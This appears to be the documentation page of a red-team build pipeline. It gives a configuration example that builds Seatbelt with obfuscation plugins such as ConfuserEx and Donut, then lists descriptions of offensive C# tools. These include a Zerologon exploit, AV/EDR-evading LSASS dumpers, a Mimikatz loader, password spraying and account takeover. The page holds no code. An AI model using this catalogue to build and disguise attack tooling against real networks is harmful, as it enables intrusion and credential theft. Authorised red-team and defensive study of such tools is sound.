tool: - name: SeatbeltLocal description: Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives. gitLink: C:\Users\alpha\Desktop\SeatbeltLocal solutionPath: SeatbeltLocal\Seatbelt.sln language: c# plugins: RandomGuid, RandomAssemblyInfo, BuildCsharp, ConfuserEx, Donut authUser: authToken:
Where:
Name: name of the tool
Description: tool description
GitLink: path where the tool is located
SolutionPath: solution (sln file) path
Language: language used (currently only c# is supported)
Plugins: plugins to user on this tool build process
AuthUser: user name from github (not used for local repositories)
AuthToken: auth token from github (not used for local repositories)
Requirements for the release version (Visual Studio 2019/2022 is not required)
Description: A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts (Petitpotam) and relaying to the certificate service.
Description: This modified fork of SafetyKatz dynamically fetches the latest pre-compiled release of Mimikatz directly from the gentilkiwi GitHub repo, runtime patching on detected signatures and uses SharpSploit DInvoke to get it into memory.
Description: Enumerate Domain Data is designed to be similar to PowerView but in .NET. PowerView is essentially the ultimate domain enumeration tool, and we wanted a .NET implementation that we worked on ourselves. This tool was largely put together by viewing implementations of different functionality across a wide range of existing projects and combining them into EDD.
Description: PurpleSharp is an open source adversary simulation tool written in C# that executes adversary techniques within Windows Active Directory environments
Description: Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
Description: SharpChromium is a .NET 4.0+ CLR project to retrieve data from Google Chrome, Microsoft Edge, and Microsoft Edge Beta. Currently, it can extract
Description: SharpCloud is a simple C# utility for checking for the existence of credential files related to Amazon Web Services, Microsoft Azure, and Google Compute.
Description: SharpDir is a simple code set to search both local and remote file systems for files using the same SMB process as dir.exe, which uses TCP port 445
Description: Checks running processes, process metadata, Dlls loaded into your current process and each DLLs metadata, common install directories, installed services and each service binaries metadata, installed drivers and each drivers metadata, all for the presence of known defensive products such as AV's, EDR's and logging tools.
Description: SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.
Description: This project reuses open handles to lsass to parse or minidump lsass, therefore you don't need to use your own lsass handle to interact with it. (Dinvoke-version)
Description: This executable is made to be executed within Cobalt Strike session using execute-assembly. It will retrieve the LAPS password from the Active Directory.
Description: Create a minidump of the LSASS process from memory (Windows 10 - Windows Server 2016). The entire process uses dynamic API calls, direct syscall and Native API unhooking to evade the AV / EDR detection.
Description: This project is a C# tool to use Pass-the-Hash for authentication on a local Named Pipe for user Impersonation. You need a local administrator or SEImpersonate rights to use this.
Description: SharpReg is a simple code set to interact with the Remote Registry service API using the same SMB process as reg.exe, which uses TCP port 445
Description: SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr, formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI.
Description: SharpSpray a simple code set to perform a password spraying attack against all users of a domain using LDAP and is compatible with Cobalt Strike.
Description: SharpSvc is a simple code set to interact with the SC Manager API using the same DCERPC process as sc.exe, which open with TCP port 135 and is followed by the use of an ephemeral TCP port
Description: SharpTask is a simple code set to interact with the Task Scheduler service API using the same DCERPC process as schtasks.exe, which open with TCP port 135 and is followed by the use of an ephemeral TCP port.
Description: An exploit for CVE-2020-1472, a.k.a. Zerologon. This tool exploits a cryptographic vulnerability in Netlogon to achieve authentication bypass.
Description: While Sysmon's driver can be renamed at installation, it is always loaded at altitude 385201. The objective of this tool is to challenge the assumption that our defensive tools are always collecting events.
Description: Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly, but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment).
Description: Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute, effectively adding "Shadow Credentials" to the target account.
Login
